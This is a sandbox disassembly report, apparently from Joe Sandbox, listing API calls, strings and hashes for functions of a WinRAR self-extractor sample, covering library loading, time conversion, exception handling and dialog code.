Instruction ID: f140659b45536fa1215fac8e1bfc81dc7944e955e93cff0c71bdbba99a9fc1b2
Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction Fuzzy Hash: 83716E76B14B0586EB10EF25D8812ADB7B0FB88B98B801133EA4E47B68CF7CD154C351

Function 00007FF7E1DE72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE7371
GetLastError.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE737F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73A9
FreeLibrary.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73EF
GetProcAddress.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73FB

Strings

api-ms-, xrefs: 00007FF7E1DE7391

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction ID: f9ad0f257f7386ec26b8b16470437af59eade0bd73d8cc01fcff8f83b411e8f3
Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction Fuzzy Hash: 3931C731E1A64191EF95FB05A802775A394FF08BB1F998636DD2D87344DFBCE4508362

Function 00007FF7E1DE1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE162B
GetProcAddress.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE1648
GetProcAddress.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE1664

Strings

ReleaseSRWLockExclusive, xrefs: 00007FF7E1DE1653
KERNEL32.DLL, xrefs: 00007FF7E1DE1624
AcquireSRWLockExclusive, xrefs: 00007FF7E1DE163E

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: e3b67ab74049ec37b2913a49a5c1d3b75b5b2198f26d218d97a66d898b230ad9
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: 85113C20F09B0281FF59EB00A9423749395AF48796FCD853BC81D46358EEBCA594CA33

Function 00007FF7E1DCED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC51A4: GetVersionExW.KERNEL32 ref: 00007FF7E1DC51D5

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCED8C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCED98
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDA8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDB6
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEDC4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7E1DB5AB4), ref: 00007FF7E1DCEE05

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction ID: cefe44aa1938e9313dfd923b645c46346187aac38f8270c79abb7a9ac5434d6f
Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction Fuzzy Hash: 3251BCB2B006518BEB04DFB8D4412ACB7B5F748B88BA0403ADE0D57B58DF78E552CB51

Function 00007FF7E1DCF010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF7E1DCF074

Part of subcall function 00007FF7E1DC51A4: GetVersionExW.KERNEL32 ref: 00007FF7E1DC51D5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF7E1DCF096
FileTimeToSystemTime.KERNEL32 ref: 00007FF7E1DCF0A2
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF7E1DCF0B2
SystemTimeToFileTime.KERNEL32 ref: 00007FF7E1DCF0C0
SystemTimeToFileTime.KERNEL32 ref: 00007FF7E1DCF0CE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction ID: 027bde150165d0a547212c85eb55af3c2f77087487a9e22845b33b53ccbae8e8
Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction Fuzzy Hash: 29316B66B00A518DFB00DFB5D8812EC7370FB08748B94503AEE0D93A58EF78D995C311

Function 00007FF7E1DC7918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC7C8C

Strings

rar, xrefs: 00007FF7E1DC7A9B, 00007FF7E1DC7AAA, 00007FF7E1DC7B67, 00007FF7E1DC7B7C
.rar, xrefs: 00007FF7E1DC7969, 00007FF7E1DC7978
exe, xrefs: 00007FF7E1DC79AF, 00007FF7E1DC79BE
sfx, xrefs: 00007FF7E1DC79F3, 00007FF7E1DC7A02

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
Instruction ID: eb53b55f0e074bfc5f77de7fa3df6868a5086c31ea7f780718e59a7002732f44
Opcode Fuzzy Hash: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
Instruction Fuzzy Hash: 1AA1C322A14A0640EB04EB25D8463BDA361BF44BA8F845637DE1D076D9DFBCE591C3A2

Function 00007FF7E1DE5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7E1DE5D58

Part of subcall function 00007FF7E1DE5210: abort.LIBCMT ref: 00007FF7E1DE5223

_CallSETranslator.LIBVCRUNTIME ref: 00007FF7E1DE5DA3
abort.LIBCMT ref: 00007FF7E1DE5FD1

Strings

RCC, xrefs: 00007FF7E1DE5D74
MOC, xrefs: 00007FF7E1DE5D6C

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction ID: 6ed1e91ef9d2aa3b9a51b6705739f77dcb03c3bb37bf1b9460528b1077ade697
Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction Fuzzy Hash: 9E91DFB7E08B858AE714EB64E4813ADBBA0F704789F50813AEE4D87B55DF78D091CB01

Function 00007FF7E1DE4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E1DE4FAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7E1DE5040
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DE2F5E), ref: 00007FF7E1DE508F

Strings

csm, xrefs: 00007FF7E1DE5026
f, xrefs: 00007FF7E1DE4FBE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction ID: 7e58b30fd186df0347e1598f5f27a7cdeb64f32688f42f3c99eda770cad47172
Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction Fuzzy Hash: C2511476E0960286EB18EF11E441B28B795FB40BC9F90C132EA1F87748DFB8E941C751

Function 00007FF7E1DBCEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7E1DBD03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD0D7

Part of subcall function 00007FF7E1DBDE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DBCF4B), ref: 00007FF7E1DBDE27
Part of subcall function 00007FF7E1DBDE04: GetLastError.KERNEL32 ref: 00007FF7E1DBDE88
Part of subcall function 00007FF7E1DBDE04: CloseHandle.KERNEL32 ref: 00007FF7E1DBDE9B

Strings

SeRestorePrivilege, xrefs: 00007FF7E1DBCF5E
SeSecurityPrivilege, xrefs: 00007FF7E1DBCF3F

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
Instruction ID: 1668c8b9e98d3bbdd1ce7808b20e085a9707c610e1662256e81b81d6f5be6c0d
Opcode Fuzzy Hash: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
Instruction Fuzzy Hash: 54511562F08A5255FB00FB60D8537BDA361AF847E8F840132ED5E53696DFBCE485C222

Function 00007FF7E1DD7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF7E1DD7B6F
GetWindowRect.USER32 ref: 00007FF7E1DD7BC0
ShowWindow.USER32 ref: 00007FF7E1DD7C96
ShowWindow.USER32 ref: 00007FF7E1DD7CC3

Strings

RarHtmlClassName, xrefs: 00007FF7E1DD7C4B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
Instruction ID: 2e62870e65fb757fbd1bda321de6b9aa9b13a3bf78289bb6f69361299b9226dd
Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
Instruction Fuzzy Hash: 8C51B832B087418AEB24EB25E45637AE360FF84B95F844576EE8E43B54DFBCE0458711

Function 00007FF7E1DDFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DDFD43
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7E1DDFDBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDFE1B

Strings

sfxcmd, xrefs: 00007FF7E1DDFD3C
sfxpar, xrefs: 00007FF7E1DDFDB5

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
Instruction ID: df48cc396159174bacbef44a2b046e1b122c38519f27a29b3391f3841e80f16d
Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
Instruction Fuzzy Hash: 4D31B632E14A0584EF04EB69D8862AC7371FB48B9CF940632DE5D17798DF78D192C355

Function 00007FF7E1DDFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF7E1DDFF34, 00007FF7E1DDFF99
RENAMEDLG, xrefs: 00007FF7E1DDFF60

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: 85a40b56fa9696c7fc49f7a23bccf63d3df32a94d8178bac27f7e44259b23305
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: A5211226A08B4780FB10EB15F8463B5E360AB4AB89FD50177E58D47364CEBCE1998362

Function 00007FF7E1DEBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7E1DEBFD0
GetProcAddress.KERNEL32 ref: 00007FF7E1DEBFE6
FreeLibrary.KERNEL32 ref: 00007FF7E1DEC00B

Strings

mscoree.dll, xrefs: 00007FF7E1DEBFC7
CorExitProcess, xrefs: 00007FF7E1DEBFDF

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction ID: a55f9bd5a4a79f8fe802cbe9fc2530b63fd41b345ad3cc3ad727db3e500e1959
Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction Fuzzy Hash: 08F04421B19A4281EF48EB11E446379A760AF8C794FC45037E94F46668DE7CE5E4C712

Function 00007FF7E1DF45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DF4605

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: 60aeb4988299d0665791c49312ba3e2956a44120c7f0dad3aaa063fe87155721
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: 46811622F1865285FB21FB2588427BCA7A0BB49B54FC44137DD0E53799CFBCA661C322

Function 00007FF7E1DC3AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7E1DC3BBB
CreateFileW.KERNEL32 ref: 00007FF7E1DC3C24
SetFileTime.KERNEL32 ref: 00007FF7E1DC3CEC
CloseHandle.KERNEL32 ref: 00007FF7E1DC3CF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC3D2C

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
Instruction ID: 61bc5517dbf522947cdceb7a794326577c71d0b986cac0e56231e97ba2db3426
Opcode Fuzzy Hash: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
Instruction Fuzzy Hash: 23512432F04B0269FB10EBB5E4423BCA371EB487A8F804A36DE1D467D8DE789155C352

